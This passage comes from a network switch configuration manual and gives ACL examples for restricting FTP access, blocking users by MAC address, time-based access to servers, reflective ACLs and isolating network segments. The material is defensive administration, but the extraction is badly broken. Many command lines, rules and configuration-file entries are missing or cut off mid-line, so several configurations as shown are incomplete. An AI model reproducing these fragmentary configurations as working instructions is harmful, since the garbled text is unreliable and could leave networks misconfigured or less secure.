#
return

Typical Configuration Examples 12 Typical Security Configuration
12 Typical Security Configuration
About This Chapter
12.1 Typical ACL Configuration

12.2 Example for Configuring Port Security

12.1 Typical ACL Configuration

12.1.1 Example for Using an ACL to Restrict FTP Access Rights
ACL Overview
An Access Control List (ACL) consists of one rule or a set of rules that describe the packet
matching conditions. These conditions include source addresses, destination addresses, and
port numbers of packets.
An ACL is a packet filter that filters packets based on rules. A device with an ACL
configured matches packets based on the rules to obtain the packets of a certain type, and then
decides to forward or discard these packets according to the policies used by the service
module to which the ACL is applied.
Depending on the rule definition methods, ACLs include basic ACL, advanced ACL, and
Layer 2 ACL. A basic ACL defines rules to filter IPv4 packets based on information such as
source IP addresses, fragment information, and time ranges. If you only need to filter packets
based on source IP addresses, you can configure a basic ACL.
In this example, a basic ACL is applied to the FTP module to allow only the specified clients
to access the FTP server, improving FTP server security.
Configuration Notes
l In this example, the local user password is in irreversible-cipher mode, indicating that
the password is encrypted using the irreversible algorithm. Unauthorized users cannot
obtain the plain-text password through decryption. Therefore, this algorithm has a higher
security.
l This example, excluding the password encryption mode, applies to all versions and
models.
As shown in Figure 12-1, the Switch functions as an FTP server. The requirements are as
follows:
l All the users on subnet 1 (172.16.105.0/24) are allowed to access the FTP server
anytime.
l All the users on subnet 2 (172.16.107.0/24) are allowed to access the FTP server only at
the specified period of time.
l Other users are not allowed to access the FTP server.
The routes between the Switch and subnets are reachable. You need to configure the Switch to
limit user access to the FTP server.

Figure 12-1 Using basic ACLs to restrict FTP access rights

PC1
172.16.105.111/24
FTP Server
PC2
Network
172.16.107.111/24
Switch
172.16.104.110/24
PC3
10.10.10.1/24
Procedure
Step 1 Configure a time range.
[Switch] time-range ftp-access from 0:0 2014/1/1 to 23:59 2014/12/31 //Create an
absolute time range for an ACL.
[Switch] time-range ftp-access 14:00 to 18:00 off-day //Create a periodic time
range for an ACL. The ftp-access time range is the overlap of the two time ranges.
Step 2 Configure a basic ACL.

[Switch] acl number 2001
[Switch-acl-basic-2001] rule permit source 172.16.105.0 0.0.0.255 //Allow users
on network segment 172.16.105.0/24 to access the FTP server anytime.
[Switch-acl-basic-2001] rule permit source 172.16.107.0 0.0.0.255 time-range ftp-
access //Allow users on network segment 172.16.107.0/24 to access the FTP server
only in the ftp-access time range.
[Switch-acl-basic-2001] rule deny source any //Prevent other users from
accessing the FTP server.
Step 3 Configure basic FTP functions.

[Switch] ftp server enable //Enable the FTP server to allow users to log in to
the device through FTP.
[Switch] aaa
[Switch-aaa] local-user huawei password irreversible-cipher SetUesrPasswd@123 //
Configure the FTP user name and password.
[Switch-aaa] local-user huawei privilege level 15 //Set the FTP user level.
[Switch-aaa] local-user huawei service-type ftp //Set the FTP user service type.
[Switch-aaa] local-user huawei ftp-directory flash: //Configure the FTP working
directory.
[Switch-aaa] quit
Step 4 Configure access permissions on the FTP server.

[Switch] ftp acl 2001 //Apply an ACL to the FTP module.

Run the ftp 172.16.104.110 command on PC1 (172.16.105.111/24) in subnet 1. PC1 can
connect to the FTP server.
Run the ftp 172.16.104.110 command on PC2 (172.16.107.111/24) in subnet 2 on Monday in
2014. PC2 cannot connect to the FTP server. Run the ftp 172.16.104.110 command on PC2
(172.16.107.111/24) in subnet 2 at 15:00 on Saturday in 2014. PC2 can connect to the FTP
server.

Run the ftp 172.16.104.110 command on PC3 (10.10.10.1/24). PC3 cannot connect to the
FTP server.
----End
Configuration Files
#
sysname Switch
#
FTP server enable
FTP acl 2001
#
time-range ftp-access 14:00 to 18:00 off-day
time-range ftp-access from 00:00 2014/1/1 to 23:59 2014/12/31
#
acl number 2001
rule 5 permit source 172.16.105.0 0.0.0.255
rule 10 permit source 172.16.107.0 0.0.0.255 time-range ftp-access
rule 15 deny
#
aaa
local-user huawei password irreversible-cipher %^%#uM-!TkAaGB5=$$6SQuw$#batog!
R7M_d^!o{*@N9g'e0baw#%^%#
local-user huawei privilege level 15
local-user huawei ftp-directory flash:
local-user huawei service-type ftp
#
return
12.1.2 Example for Using ACLs to Control Access to the Specified

Server in the Specified Time Range
ACL Overview
Layer 2 ACL. An advanced ACL defines rules to filter IPv4 packets based on source IP
addresses, destination addresses, IP protocol types, TCP source/destination port numbers,
UDP source/destination port numbers, fragment information, and time ranges. Compared with
a basic ACL, an advanced ACL is more accurate, flexible, and provides more functions. For
example, if you want to filter packets based on source and destination IP addresses, configure
an advanced ACL.
In this example, advanced ACLs are applied to the traffic policy module so that the device can
filter the packets from users to the specified server and thus restrict access to the specified
server based on time range.

Configuration Notes
This example applies to all versions and models.
As shown in Figure 1, the departments of an enterprise are connected through the Switch. The
R&D and marketing departments cannot access the salary query server at 10.164.9.9 in work
hours (08:00 to 17:30), whereas the president office can access the server at anytime.
Figure 12-2 Using ACLs to control access to the specified server in the specified time range
L A N S w it c h A
V LA N 10
S a la r y q u e r y s e r v e r
G E 1 /0 /1 1 0 .1 6 4 .9 .9 /2 4
V L A N IF 1 0
P r e s id e n t o ffic e 1 0 .1 6 4 .1 .1 /2 4 G E 2 /0 /1
1 0 .1 6 4 .1 .0 /2 4 V L A N IF 1 0 0
L A N S w it c h B 1 0 .1 6 4 .9 .1 /2 4
V LA N 20 G E 1 /0 /2
In te rn e t
V L A N IF 2 0
1 0 .1 6 4 .2 .1 /2 4 S w it c h R o u te r
M a r k e tin g
1 0 .1 6 4 .2 .0 /2 4 G E 1 /0 /3
V L A N IF 3 0
VLAN30 1 0 .1 6 4 .3 .1 /2 4
L A N S w it c h C
R&D
1 0 .1 6 4 .3 .0 /2 4
The following configurations are performed on the Switch. The configuration roadmap is as
follows:
1. Configure the time range, advanced ACL, and ACL-based traffic classifier to filter
packets from users to the server in the specified time range. In this way, you can restrict
the access of different users to the server in the specified time range.
2. Configure a traffic behavior to discard the packets matching the ACL.
3. Configure and apply a traffic policy to make the ACL and traffic behavior take effect.
Procedure
Step 1 Add interfaces to VLANs and assign IP addresses to the VLANIF interfaces.
# Add GE 1/0/1 through GE1/0/3 to VLANs 10, 20, and 30 respectively, add GE2/0/1 to
VLAN 100, and assign IP addresses to VLANIF interfaces. The configurations on GE 1/0/1
and VLANIF 10 are used as an example here. The configurations on GE1/0/2, GE1/0/3, and
GE2/0/1 are similar to the configurations on GE 1/0/1, and the configurations on VLANIF 20,
VLANIF 30, and VLANIF 100 are similar to the configurations on VLANIF 10.


[Switch-Vlanif10] ip address 10.164.1.1 255.255.255.0
Step 2 Configure the time range.

# Configure the time range from 8:00 to 17:30.
[Switch] time-range satime 8:00 to 17:30 working-day //Configure a periodic time
range for an ACL.

# Configure an ACL for the marketing department to access the salary query server.
[Switch] acl 3002
[Switch-acl-adv-3002] rule deny ip source 10.164.2.0 0.0.0.255 destination
10.164.9.9 0.0.0.0 time-range satime //Prevent the marketing department from
accessing the salary query server in the time range satime.
# Configure an ACL for the R&D department to access the salary query server.
[Switch] acl 3003
10.164.9.9 0.0.0.0 time-range satime //Prevent the R&D department from accessing
the salary query server in the time range satime.
Step 4 Configure ACL-based traffic classifiers.

# Configure the traffic classifier c_market to classify the packets that match ACL 3002.
[Switch] traffic classifier c_market //Create a traffic classifier.
[Switch-classifier-c_market] if-match acl 3002 //Associate an ACL with the
traffic classifier.
[Switch-classifier-c_market] quit
# Configure the traffic classifier c_rd to classify the packets that match ACL 3003.
[Switch] traffic classifier c_rd //Create a traffic classifier.
[Switch-classifier-c_rd] if-match acl 3003 //Associate an ACL with the traffic
classifier.
[Switch-classifier-c_rd] quit

# Configure the traffic behavior b_market to reject packets.
[Switch] traffic behavior b_market //Create a traffic behavior.
[Switch-behavior-b_market] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-b_market] quit
# Configure the traffic behavior b_rd to reject packets.

[Switch] traffic behavior b_rd //Create a traffic behavior.
[Switch-behavior-b_rd] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-b_rd] quit
Step 6 Configure traffic policies.

# Configure the traffic policy p_market and associate the traffic classifier c_market and the
traffic behavior b_market with the traffic policy.
[Switch] traffic policy p_market //Create a traffic policy.
[Switch-trafficpolicy-p_market] classifier c_market behavior b_market //

Associate the traffic classifier c_market with the traffic behavior b_market.
[Switch-trafficpolicy-p_market] quit
# Configure the traffic policy p_rd and associate the traffic classifier c_rd and the traffic
behavior b_rd with the traffic policy.
[Switch] traffic policy p_rd //Create a traffic policy.
[Switch-trafficpolicy-p_rd] classifier c_rd behavior b_rd //Associate the
traffic classifier c_rd with the traffic behavior b_rd.
[Switch-trafficpolicy-p_rd] quit
Step 7 Apply the traffic policy.

# Packets from the marketing department to the server are received by GE1/0/2; therefore,
apply the traffic policy p_market to the inbound direction of GE1/0/2.
[Switch-GigabitEthernet1/0/2] traffic-policy p_market inbound //Apply the
traffic policy to the inbound direction of an interface.
# Packets from the R&D department to the server are received by GE1/0/3; therefore, apply
the traffic policy p_rd to the inbound direction of GE1/0/3.
[Switch-GigabitEthernet1/0/3] traffic-policy p_rd inbound //Apply the traffic
policy to the inbound direction of an interface.

# Check the configuration of ACL rules.
[Switch] display acl all
Total nonempty ACL number is 2

Acl's step is 5
rule 5 deny ip source 10.164.2.0 0.0.0.255 destination 10.164.9.9 0 time-range
satime (match-counter 0)(Active)

Acl's step is 5
satime (match-counter 0)(Active)
# Check the configuration of the traffic classifier.

[Switch] display traffic classifier user-defined
Classifier: c_market
Precedence: 5
Operator: OR
Classifier: c_rd
Precedence: 10
Operator: OR
# Check the configuration of the traffic policy.

[Switch] display traffic policy user-defined
Policy: p_market
Classifier: c_market
Operator: OR

Behavior: b_market
Deny
Policy: p_rd
Classifier: c_rd
Operator: OR
Behavior: b_rd
Deny
Total policy number is 2
# Check the traffic policy application records.

[Switch] display traffic-policy applied-record
#
-------------------------------------------------
Policy Name:
p_market
Policy Index:
0
Classifier:c_market
Behavior:b_market
-------------------------------------------------
*interface GigabitEthernet1/0/2
traffic-policy p_market
inbound
slot 1 :
success
-------------------------------------------------
Policy total applied times:

1.
-------------------------------------------------
Policy Name:
p_rd
Policy Index:
1
Classifier:c_rd
Behavior:b_rd
-------------------------------------------------
*interface
traffic-policy p_rd
inbound
slot 1 :
success
-------------------------------------------------

1.

# The R&D and marketing departments cannot access the salary query server in work hours
(08:00 to 17:30).
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20 30 100
#
time-range satime 08:00 to 17:30 working-day
#
acl number 3002
satime
acl number 3003
satime
#
traffic classifier c_market operator or precedence 5
if-match acl 3002
traffic classifier c_rd operator or precedence 10
if-match acl 3003
#
traffic behavior b_market
deny
traffic behavior b_rd
deny
#
traffic policy p_market match-order config
classifier c_market behavior b_market
traffic policy p_rd match-order config
classifier c_rd behavior b_rd
#
interface Vlanif10
ip address 10.164.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.164.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.164.3.1 255.255.255.0
#
interface Vlanif100
ip address 10.164.9.1 255.255.255.0
#
#
traffic-policy p_market inbound
#
traffic-policy p_rd inbound
#


#
return
Related Information
Support Community
ACL Application
12.1.3 Example for Using an ACL to Block Network Access of the

Specified Users
ACL Overview
Layer 2 ACL. A Layer 2 ACL defines rules to filter IPv4 and IPv6 packets based on Ethernet
frame information, such as source MAC addresses, destination MAC addresses, VLANs, and
Layer 2 protocol types. Basic ACLs and advanced ACLs filter packets based on Layer 3 and
Layer 4 information, while Layer 2 ACLs filter packets based on Layer 2 information. For
example, if you want to filter packets based on MAC addresses and VLANs, configure a
Layer 2 ACL.
In this example, a Layer 2 ACL is applied to the traffic policy module so that the device can
filter the packets from users with certain MAC addresses to the Internet and thus prevent these
users from accessing the Internet.
Configuration Notes
As shown in Figure 12-3, the Switch that functions as the gateway is connected to PCs. The
administrator wants to block network access of PC1 after detecting that PC1 (00e0-
f201-0101) is an unauthorized user.

Figure 12-3 Using Layer 2 ACLs to block network access of the specified users
G E 2 /0 /1 G E 1 /0 /1
PC1
In te rn e t
0 0 e 0 -f2 0 1 -0 1 0 1
S w itc h A S w itc h R o u te r
PC2
0 0 e 0 -f2 0 1 -0 1 0 2
follows:
1. Configure a Layer 2 ACL and ACL-based traffic classifier to discard packets from MAC
address 00e0-f201-0101 (preventing the user with this MAC address from accessing the
network).
Procedure
Step 1 Configure an ACL.
# Configure a Layer 2 ACL to meet the preceding requirement.
[Switch] acl 4000
[Switch-acl-L2-4000] rule deny source-mac 00e0-f201-0101 ffff-ffff-ffff //Reject
the packets from source MAC address 00e0-f201-0101.
[Switch-acl-L2-4000] quit
Step 2 Configure an ACL-based traffic classifier.

# Configure the traffic classifier tc1 to classify packets that match ACL 4000.
[Switch] traffic classifier tc1 //Create a traffic classifier.
[Switch-classifier-tc1] if-match acl 4000 //Associate an ACL with the traffic
classifier.
[Switch-classifier-tc1] quit
Step 3 Configure the traffic behavior.

# Configure the traffic behavior tb1 to reject packets.
[Switch] traffic behavior tb1 //Create a traffic behavior.
[Switch-behavior-tb1] deny //Set the action of the traffic behavior to deny.
[Switch-behavior-tb1] quit
Step 4 Configure the traffic policy.

# Configure the traffic policy tp1 and associate tc1 and tb1 with the traffic policy.
[Switch] traffic policy tp1 //Create a traffic policy.
[Switch-trafficpolicy-tp1] classifier tc1 behavior tb1 //Associate the traffic

classifier tc1 with the traffic behavior tb1.

[Switch-trafficpolicy-tp1] quit

# Packets from PC1 to the Internet are received by GE2/0/1; therefore, apply the traffic policy
tp1 to the inbound direction of GE2/0/1.
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 inbound //Apply the traffic

# Check the configuration of the ACL rule.
[Switch] display acl 4000
L2 ACL 4000, 1 rule
Acl's step is 5
rule 5 deny source-mac 00e0-f201-0101

Classifier: tc1
Precedence: 5
Operator: OR

[Switch] display traffic policy user-defined tp1
Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny

#
-------------------------------------------------
Policy Name:
tp1
Policy Index:
0
Classifier:tc1
Behavior:tb1
-------------------------------------------------
*interface
traffic-policy tp1
inbound
slot 2 :
success

-------------------------------------------------

1.
# The user with MAC address 00e0-f201-0101 cannot access the Internet.
----End
Configuration Files
#
sysname Switch
#
acl number 4000
rule 5 deny source-mac 00e0-f201-0101
#
traffic classifier tc1 operator or precedence 5
if-match acl 4000
#
traffic behavior tb1
deny
#
traffic policy tp1 match-order config
classifier tc1 behavior tb1
#
traffic-policy tp1 inbound
#
return
12.1.4 Example for Using Reflective ACL to Implement

Unidirectional Access Control
Reflective ACL Overview

Reflective ACL is a type of dynamic ACL. The device creates a reflective ACL by swapping
the source/destination IP addresses and source/destination port numbers of an ACL. A
reflective ACL has an aging time. If packets passing the interface match the reflective ACL
within the aging time, this reflective ACL is kept in the next aging time interval. If no packet
passing the interface matches the reflective ACL within the aging time, the reflective ACL is
deleted. This mechanism improves device security.
Reflective ACL implements unidirectional access control. An external host can access an
internal host only after the internal host accesses the external host first. Therefore, reflective
ACL protects enterprises' internal networks against attacks initiated by external users.
In this example, an advanced reflective ACL is used to prevent the servers on the Internet
from actively establishing UDP connections with internal hosts. The external servers can
establish UDP connections with internal hosts only after the internal hosts connect to the
external servers first. Reflective ACL implements unidirectional access control between
internal and external networks.

Configuration Notes
This example applies to all S12700 versions.
As shown in Figure 12-4, Switch functions as the gateway to connect PCs to the Internet.
There are reachable routes among the devices. To ensure internal network security, the
administrator allows servers on the Internet to establish UDP connections with internal PCs
only after the internal PCs have established UDP connections with the external servers.
Figure 12-4 Using reflective ACL to implement unidirectional access control

Server
192.168.1.2
PC1 GE1/0/1 GE2/0/1 Internet

10.1.1.2/24
SwitchA Switch Router
PC2
10.1.1.3/24
follows:
1. Configure an advanced ACL based on which the device will generate a reflective ACL.
2. Configure the reflective ACL function to allow internal PC1 to establish a UDP
connection with a server on the Internet and prevent the external server from actively
establishing a UDP connection with internal hosts.
Procedure
Step 1 Configure an advanced ACL.
# Create advanced ACL 3000 and configure a rule to permit UDP packets.
[Switch] acl 3000
[Switch-acl-adv-3000] rule permit udp //Allow UDP packets to pass.
Step 2 Configure the reflective ACL function.

# Packets from the Internet are received by GE2/0/1; therefore, configure the reflective ACL
function in the outbound direction of GE2/0/1 so that the Switch can generate reflective ACL
for UDP packets.
[Switch-GigabitEthernet2/0/1] traffic-reflect outbound acl 3000 //Apply the

reflective ACL to the outbound direction of an interface.

Run the display traffic-reflect command to check reflective ACL information.

[Switch] display traffic-reflect outbound acl 3000
Proto SP DP DIP SIP Count Timeout Interface
------------------------------------------------------------------------------
UDP 2 80 192.168.1.2 10.1.1.2 9 300(s)
------------------------------------------------------------------------------
* Total <1> flows accord with condition, <1> items was displayed.
------------------------------------------------------------------------------
* Proto=Protocol,SIP=Source IP,DIP=Destination IP,Timeout=Time to cutoff,
* SP=Source port,DP=Destination port,Count=Packets count(data).
The preceding information will be displayed only after internal hosts have established UDP
connections with external servers. The preceding information shows that a reflective ACL has
been generated on GE2/0/1 for the UDP packets between PC1 and server (192.168.1.2), and
provides packet statistics.
----End
Configuration Files
#
sysname Switch
#
acl number 3000
rule 5 permit udp
#
traffic-reflect outbound acl 3000
#
return
12.1.5 Example for Allowing Certain Users to Access the Internet

in the Specified Time Range
ACL Time Range Overview

An ACL defines many matching conditions to filter most packets transmitted on a network;
however, it cannot filter packets in the specified time range.
You can configure a time range and associate the time range with an ACL rule to filter
packets based on time. In this way, you can specify different policies for users in different
time ranges.
In this example, a basic ACL associated with a time range is applied to the traffic policy
module so that the device can filter packets from internal users to the Internet in the specified
time range. As a result, users can access the Internet only in the specified time range.
Configuration Notes

As shown in Figure 12-5, the departments of an enterprise are connected through the Switch.
The enterprise allows all employees to access the Internet on work days (Monday to Friday),
and only the managers to access the Internet on weekends (Saturday and Sunday).
Figure 12-5 Allowing certain users to access the Internet in the specified time range
L A N S w itc h A
VLAN 10
G E 1 /0 /1
V L A N IF 1 0
1 0 .1 .1 .1 /2 4
R & D : 1 0 .1 .1 .0 /2 4
R & D m a n a g e r’s h o s t: G E 2 /0 /1
1 0 .1 .1 .1 1 In te rn e t
S w itc h R o u te r
G E 1 /0 /2
VLAN 20 V L A N IF 2 0
L A N S w itc h B 1 0 .1 .2 .1 /2 4
M a rk e tin g : 1 0 .1 .2 .0 /2 4
M a rk e tin g m a n a g e r’s
h o st: 1 0 .1 .2 .1 2
follows:
1. Configure the time range, basic ACL, and ACL-based traffic classifier to filter packets
from internal users to the Internet and thus allow only certain users to access the Internet
in the specified time range.
2. Configure a traffic behavior to permit the packets that match the ACL permit rule.
Procedure
# Configure GE1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively. Configure GE2/0/1 of the Switch as a trunk interface and add
it to both VLAN 10 and VLAN 20.


# Create VLANIF 10 and VLANIF 20 and assign IP addresses to them.


# Configure the periodic time range from Saturday to Sunday.
[Switch] time-range rest-time 0:00 to 23:59 off-day //Configure a periodic time
range for an ACL.

# Create basic ACL 2001 and configure rules to allow the R&D and marketing managers
(10.1.1.11 and 10.1.2.12) to access the Internet anytime and prevent other employees from
accessing the Internet on Saturday and Sunday. That is, only the managers of R&D and
marketing departments can access the Internet on Saturday and Sunday.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.11 0 //Allow the manager of
the R&D department to access the Internet anytime.
[Switch-acl-basic-2001] rule permit source 10.1.2.12 0 //Allow the manager of
the marketing department to access the Internet anytime.
[Switch-acl-basic-2001] rule deny time-range rest-time //Prevent other users
from accessing the Internet On Saturday and Sunday.
Step 4 Configure the basic ACL-based traffic classifier.

classifier.

# Configure the traffic behavior tb1 and set the action to permit (default value).
NOTE
Packets matching the ACL are discarded as long as a deny action exists in an ACL rule or traffic behavior.

# Define the traffic policy and associate the traffic classifier and traffic behavior with the
traffic policy.
Step 7 Apply the traffic policy to an interface.

# Packets from internal hosts are forwarded to the Internet through GE2/0/1; therefore, apply
the traffic policy tp1 to the outbound direction of GE2/0/1.
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 outbound //Apply the traffic
policy to the outbound direction of an interface.

Basic ACL 2001, 3 rules
Acl's step is 5
rule 5 permit source 10.1.1.11 0 (match-counter 0)
rule 10 permit source 10.1.2.12 0 (match-counter 0)
rule 15 deny time-range rest-time(match-counter 0) (Inactive)

Classifier: tc1
Precedence: 5
Operator: OR

Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Permit
# Only the managers (10.1.1.11 and 10.1.2.12) of R&D and marketing departments can access
the Internet on Saturday and Sunday.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
time-range rest-time 00:00 to 23:59 off-day
#
acl number 2001
rule 15 deny time-range rest-time
#
if-match acl 2001
#
permit
#


#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
#
#
traffic-policy tp1 outbound
#
return
12.1.6 Example for Using ACLs to Restrict Mutual Access Between

Network Segments
ACL Overview
an advanced ACL.
In this example, advanced ACLs are applied to the traffic policy module so that the device can
filter the packets between different network segments and thus restrict mutual access between
network segments.
Configuration Notes
As shown in Figure 1, the departments of an enterprise are connected through the Switch. To
facilitate network management, the administrator allocates the IP addresses on two network
segments to the R&D and marketing departments respectively. In addition, the administrator

adds the two departments to different VLANs for broadcast domain isolation. The Switch
needs to restrict mutual access between two network segments to ensure information security.
Figure 12-6 Using advanced ACLs to restrict mutual access between network segments
L A N S w it c h A
V LA N 10
G E 1 /0 /1
V L A N IF 1 0
1 0 .1 .1 .1 / 2 4
R&D
1 0 .1 .1 .0 /2 4 G E2 /0 /1
In te rn e t
S w it c h R o u te r
V LA N 20 G E1 /0 /2
V L A N IF 2 0
1 0 .1 .2 .1 / 2 4
L A N S w it c h B
M a r k e tin g
1 0 .1 .2 .0 /2 4
follows:
1. Configure an advanced ACL and ACL-based traffic classifier to filter the packets
exchanged between R&D and marketing departments.
Procedure
# Configure GE 1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively.




# Create advanced ACL 3001 and configure rules for the ACL to block the packets from the
R&D department to the marketing department.
[Switch] acl 3001
[Switch-acl-adv-3001] rule deny ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0
0.0.0.255 //Prevent the R&D department from accessing the marketing department.
# Create advanced ACL 3002 and configure rules for the ACL to block the packets from the
marketing department to the R&D department.
[Switch] acl 3002
[Switch-acl-adv-3002] rule deny ip source 10.1.2.0 0.0.0.255 destination 10.1.1.0
0.0.0.255 //Prevent the marketing department from accessing the R&D department.
Step 3 Configure the advanced ACL-based traffic classifier.

# Configure the traffic classifier tc1 to classify packets that match ACL 3001 and ACL 3002.
classifier.
classifier.


traffic policy.

# The packets from the R&D and marketing departments are received by GE1/0/1 and
GE1/0/2 respectively; therefore, apply the traffic policy to the inbound direction of GE1/0/1
and GE1/0/2.



Acl's step is 5
rule 5 deny ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255 (match-
counter 0)
Acl's step is 5
rule 5 deny ip source 10.1.2.0 0.0.0.255 destination 10.1.1.0 0.0.0.255 (match-
counter 0)

Classifier: tc1
Precedence: 5
Operator: OR
if-match acl 3002

Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny
# The two network segments where the R&D and marketing departments reside cannot access
each other.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
acl number 3001
acl number 3002
#
if-match acl 3001
if-match acl 3002
#
deny
#
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#

#
#
return
Related Content
Videos
Configure ACL
12.1.7 Example for Using an ACL to Prevent Internal Hosts from

Accessing the Internet
ACL Overview
In this example, a basic ACL is applied to the traffic policy module so that the device can
filter the packets from internal hosts to the Internet and thus prevent internal hosts from
accessing the Internet.
Configuration Notes
The Switch needs to prevent some hosts of the R&D and marketing departments from
accessing the Internet to protect information security of the enterprise.

Figure 12-7 Using an ACL to prevent internal hosts from accessing the Internet
L A N S w itc h A
VLAN 10 G E 1 /0 /1
V L A N IF 1 0
1 0 .1 .1 .1 /2 4
R & D : 1 0 .1 .1 .0 /2 4
D e n ie d IP a d d re ss : 1 0 .1 .1 .1 1 G E 2 /0 /1
In te rn e t
S w itc h R o u te r
G E 1 /0 /2
VLAN 20 V L A N IF 2 0
1 0 .1 .2 .1 /2 4
L A N S w itc h B
M a rke tin g : 1 0 .1 .2 .0 /2 4
D e n ie d IP a d d re ss : 1 0 .1 .2 .1 2
follows:
1. Configure a basic ACL and ACL-based traffic classifier to filter packets from the
specified hosts of the R&D and marketing departments.
Procedure
# Configure GE1/0/1 and GE1/0/2 of the Switch as trunk interfaces and add them to VLAN
10 and VLAN 20 respectively. Configure GE2/0/1 of the Switch as a trunk interface and add
it to both VLAN 10 and VLAN 20.



# Create basic ACL 2001 and configure rules to reject the packets from hosts 10.1.1.11 and
10.1.2.12.
[Switch] acl 2001
[Switch-acl-basic-2001] rule deny source 10.1.1.11 0 //Prevent the host with IP
address 10.1.1.11 from accessing the Internet.
[Switch-acl-basic-2001] rule deny source 10.1.2.12 0 //Prevent the host with IP
address 10.1.2.12 from accessing the Internet.
Step 3 Configure the basic ACL-based traffic classifier.

classifier.


traffic policy.

# Packets from internal hosts are forwarded to the Internet through GE2/0/1; therefore, apply
the traffic policy to the outbound direction of GE2/0/1.
[Switch-GigabitEthernet2/0/1] traffic-policy tp1 outbound //Apply the traffic
policy to the outbound direction of an interface.

Basic ACL 2001, 2 rules
Acl's step is 5
rule 5 deny source 10.1.1.11 0 (match-counter 0)
rule 10 deny source 10.1.2.12 0 (match-counter 0)


Classifier: tc1
Precedence: 5
Operator: OR

Policy: tp1
Classifier: tc1
Operator: OR
Behavior: tb1
Deny
# Hosts 10.1.1.11 and 10.1.2.12 cannot access the Internet.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
acl number 2001
rule 5 deny source 10.1.1.11 0
rule 10 deny source 10.1.2.12 0
#
if-match acl 2001
#
deny
#
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
#
#
traffic-policy tp1 outbound
#
return
12.1.8 Example for Using an ACL to Prevent External Hosts from

Accessing Internal Servers

ACL Overview
an advanced ACL.
In this example, an advanced ACL is applied to the traffic policy module so that the device
can filter the packets from external hosts to internal servers and thus restrict access of external
hosts to internal servers.
Configuration Notes
The enterprise allows only internal hosts to access the financial server, but prevents external
hosts from accessing the server.
Figure 12-8 Using an ACL to prevent external hosts from accessing internal servers
L A N S w itc h A F in a n cia l se rve r
1 0 .1 6 4 .4 .4 /2 4
VLAN 10 G E 1 /0 /1
V L A N IF 1 0
1 0 .1 6 4 .1 .1 /2 4 G E 2 /0 /1
P re sid e n t o ffice :
1 0 .1 6 4 .1 .0 /2 4 V L A N IF 1 0 0
L A N S w itc h B 1 0 .1 6 4 .4 .1 /2 4
G E 1 /0 /2
VLAN 20 In te rn e t
V L A N IF 2 0
1 0 .1 6 4 .2 .1 /2 4 S w itc h R o u te r
M a rke tin g :
1 0 .1 6 4 .2 .0 /2 4
G E 1 /0 /3
V L A N IF 3 0
VLAN 30 1 0 .1 6 4 .3 .1 /2 4
L A N S w itc h C
R&D:
1 0 .1 6 4 .3 .0 /2 4

follows:
1. Configure an advanced ACL and ACL-based traffic classifier to filter the packets from
external hosts to the financial server and thus prevent external hosts from accessing this
server.
2. Configure a traffic behavior to permit the packets that match the ACL permit rule.
Procedure
Step 1 Add interfaces to VLANs and assign IP addresses to the VLANIF interfaces.
# Add GE 1/0/1 through GE1/0/3 to VLANs 10, 20, and 30 respectively, add GE2/0/1 to
VLAN 100, and assign IP addresses to VLANIF interfaces. The configurations on GE 1/0/1
and VLANIF 10 are used as an example here. The configurations on GE1/0/2, GE1/0/3, and
GE2/0/1 are similar to the configurations on GE 1/0/1, and the configurations on VLANIF 20,
VLANIF 30, and VLANIF 100 are similar to the configurations on VLANIF 10.
# Create advanced ACL 3002 and configure rules to allow the packets from the president
office, R&D department, and marketing department to reach the financial server and block the
packets from external hosts to the financial server.
[Switch] acl 3002
10.164.4.4 0.0.0.0 //Allow the president office to access the financial server.
10.164.4.4 0.0.0.0 //Allow the marketing department to access the financial
server.
10.164.4.4 0.0.0.0 //Allow the R&D department to access the financial server.
[Switch-acl-adv-3002] rule deny ip destination 10.164.4.4 0.0.0.0 //Prevent
other users from accessing the financial server.
Step 3 Configure an ACL-based traffic classifier.
# Configure the traffic classifier c_network to classify the packets that match ACL 3002.
[Switch] traffic classifier c_network //Create a traffic classifier.
[Switch-classifier-c_network] if-match acl 3002 //Associate an ACL with the
traffic classifier.
[Switch-classifier-c_network] quit
Step 4 Configure a traffic behavior.
# Configure the traffic behavior b_network and set the action to permit (default value).

NOTE
Packets matching the ACL are discarded as long as a deny action exists in an ACL rule or traffic behavior.
[Switch] traffic behavior b_network //Create a traffic behavior.
[Switch-behavior-b_network] quit

# Configure the traffic policy p_network and associate the traffic classifier c_network and
the traffic behavior b_network with the traffic policy.
[Switch] traffic policy p_network //Create a traffic policy.
[Switch-trafficpolicy-p_network] classifier c_network behavior b_network //
Associate the traffic classifier c_network with the traffic behavior b_network.
[Switch-trafficpolicy-p_network] quit

# Packets from internal and external hosts are forwarded to the financial server through
GE2/0/1; therefore, apply the traffic policy p_network to the outbound direction of GE2/0/1.
[Switch-GigabitEthernet2/0/1] traffic-policy p_network outbound //Apply the
traffic policy to the outbound direction of an interface.

Advanced ACL 3002, 4 rules
Acl's step is 5
rule 5 permit ip source 10.164.1.0 0.0.0.255 destination 10.164.4.4 0 (match-
counter 0)
counter 0)
counter 0)
rule 20 deny ip destination 10.164.4.4 0 (match-counter 0)

Classifier: c_network
Precedence: 5
Operator: OR

Policy: p_network
Classifier: c_network
Operator: OR
